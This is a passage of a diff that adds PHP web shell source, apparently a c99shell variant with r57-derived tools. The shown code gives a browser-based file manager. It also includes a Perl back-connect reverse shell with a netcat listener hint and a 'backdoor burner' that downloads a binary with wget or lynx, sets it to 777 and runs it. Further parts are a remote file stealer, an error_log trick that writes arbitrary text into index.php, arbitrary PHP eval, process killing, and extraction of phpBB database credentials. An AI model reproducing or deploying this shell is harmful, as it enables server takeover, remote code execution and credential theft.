"LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+ elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + 
$tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + 
$row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." 
folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" 
selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "tools") +{ + + + + + + + ?> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57 </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"> + </div> + <form action="<?php echo $surl; ?>"> +<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form> + </td> + <td width="50%" height="83" valign="top"><center> + <center> + + + <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form> +Click "Connect" only after open port for it. 
You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> + + </center> + </td> +</tr></TABLE> + + + + + + + +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><b>Error_Log SAfe Mode Bypass By Psych0 ;)</b> + <form action="<?php echo $surl; ?>" method="POST"> + <input type=hidden name=act value=tools> + <textarea name="erorr" cols=100 rows=10></textarea></br> + <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84> + <input type="submit" value="Write 2 File !!"> + + </form> + + + + + + + + + + + + </div> + + </td> + <td width="50%" height="83" valign="top"><center> + <center> + <form action="<?php echo $surl; ?>" method="POST"> + <input type=hidden name=act value=tools> + Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500 value=""><br><br> +Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> +<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> +</form> +<br><br><br> + + + + + </center> + + </center> + </td> +</tr></TABLE> + + + + + + + + + + + + +<?php + +if (isset($_POST['dosyaa'])) +{ +dosyayicek($_POST['dosyaa'],$_POST['yeniyer']); + +} +if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); +echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." 
...</b>"; +} +if (!empty($_GET['dolma'])) +{ +$sayko=htmlspecialchars($_GET['dolma']); +if ($sayko == "wgetcan") +{ + +myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + + +} + +else if ($sayko =="freadcan") +{ +dosyayicek($adires,"sayko_bind"); +myshellexec("./sayko_bind"); +} + +else if ($sayko == "lynxcan") +{ +myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + +} + + + + + +} + +if (!empty($_POST['erorr'])) +{ + + + +error_log($_POST['erorr'], 3, "php://".$_POST['nere']); + + + +} + + + + + + + + + +} +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... 
"; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img 
src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ if ($k > count($head)) {$k = count($head)-1;}
+ for($i=0;$i<count($head);$i++)
+ {
+ if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+ }
+ $prcs = array();
+ foreach ($stack as $line)
+ {
+ if (!empty($line))
+ {
+ echo "<tr>";
+ $line = explode("",$line);
+ $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+ $line[2] = intval(str_replace(" ","",$line[2]))*1024;
+ $prcs[] = $line;
+ echo "</tr>";
+ }
+ }
+ }
+ $head[$k] = "<b>".$head[$k]."</b>".$y;
+ $v = $processes_sort[0];
+ usort($prcs,"tabsort");
+ if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+ $tab = array();
+ $tab[] = $head;
+ $tab = array_merge($tab,$prcs);
+ echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+ foreach($tab as $i=>$k)
+ {
+ echo "<tr>";
+ foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+ echo "</tr>";
+ }
+ echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+ echo "<b>Result of execution this PHP-code</b>:<br>";
+ $tmp = ob_get_contents();
+ $olddir = realpath(".");
+ @chdir($d);
+ if ($tmp)
+ {
+ ob_clean();
+ eval($eval);
+ $ret = ob_get_contents();
+ $ret = convert_cyr_string($ret,"d","w");
+ ob_clean();
+ echo $tmp;
+ if ($eval_txt)
+ {
+ $rows = count(explode("\r\n",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+ }
+ else {echo $ret."<br>";}
+ }
+ else
+ {
+ if ($eval_txt)
+ {
+ echo
"<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ eval($eval);
+ echo "</textarea>";
+ }
+ else {echo $ret;}
+ }
+ @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+ if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+ else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+ $r = @file_get_contents($d.$f);
+ $ext = explode(".",$f);
+ $c = count($ext)-1;
+ $ext = $ext[$c];
+ $ext = strtolower($ext);
+ $rft = "";
+ foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+ if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+ if (empty($ft)) {$ft = $rft;}
+ $arr = array(
+ array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+ array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+ array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+ array("Code","code"),
+ array("Session","phpsess"),
+ array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+ array("SDB","sdb"),
+ array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+ array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+ array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+ array("<img
src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+ array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+ );
+ echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+ foreach($arr as $t)
+ {
+ if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+ elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+ else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+ echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+ }
+ echo "<hr size=\"1\" noshade>";
+ if ($ft == "info")
+ {
+ echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+ if (!$win)
+ {
+ echo "<tr><td><b>Owner/Group</b></td><td> ";
+ $ow = posix_getpwuid(fileowner($d.$f));
+ $gr = posix_getgrgid(filegroup($d.$f));
+ echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+ }
+ echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+ $fi = fopen($d.$f,"rb");
+ if ($fi)
+ {
+ if
($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a 
href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a 
href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+ else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+ echo "Parameters for manual connect:<br>";
+ $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+ foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ echo "</b><hr size=\"1\" noshade>";
+ }
+ }
+ echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+ if (!empty($white)) {@ob_clean();}
+ highlight_file($d.$f);
+ if (!empty($white)) {c99shexit();}
+ echo "</div>";
+ }
+ elseif ($ft == "download")
+ {
+ @ob_clean();
+ header("Content-type: application/octet-stream");
+ header("Content-length: ".filesize($d.$f));
+ header("Content-disposition: attachment; filename=\"".$f."\";");
+ echo $r;
+ exit;
+ }
+ elseif ($ft == "notepad")
+ {
+ @ob_clean();
+ header("Content-type: text/plain");
+ header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+ echo($r);
+ exit;
+ }
+ elseif ($ft == "img")
+ {
+ $inf = getimagesize($d.$f);
+ if (!$white)
+ {
+ if (empty($imgsize)) {$imgsize = 20;}
+ $width = $inf[0]/100*$imgsize;
+ $height = $inf[1]/100*$imgsize;
+ echo "<center><b>Size:</b>&nbsp;";
+ $sizes = array("100","50","20");
+ foreach ($sizes as $v)
+ {
+ echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+ if ($imgsize != $v ) {echo $v;}
+ else {echo "<u>".$v."</u>";}
+ echo "</a>&nbsp;&nbsp;&nbsp;";
+ }
+ echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\"
